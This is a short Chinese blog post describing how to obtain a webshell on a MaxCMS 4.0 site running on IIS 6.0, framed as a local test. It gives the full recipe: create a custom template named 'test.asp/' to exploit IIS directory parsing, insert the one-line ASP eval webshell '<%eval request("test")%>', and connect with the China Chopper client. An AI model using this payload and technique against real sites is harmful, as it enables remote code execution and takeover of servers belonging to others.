利用后台模板获取webshell

目标:win2003+iis6.0+maxcms 4.0(无公害,本地搭建测试)

进入后台找到模板页->管理自定义模板,如下图所示:

添加模板,内容如下:
文件名填入:test.asp/

内容填入:<%eval request("test")%>

在模板管理中找到模板的位置,如下图:

使用菜刀连接即可:

posted @ 2016-01-31 20:25  Kerne0  阅读(380)  评论(0编辑  收藏  举报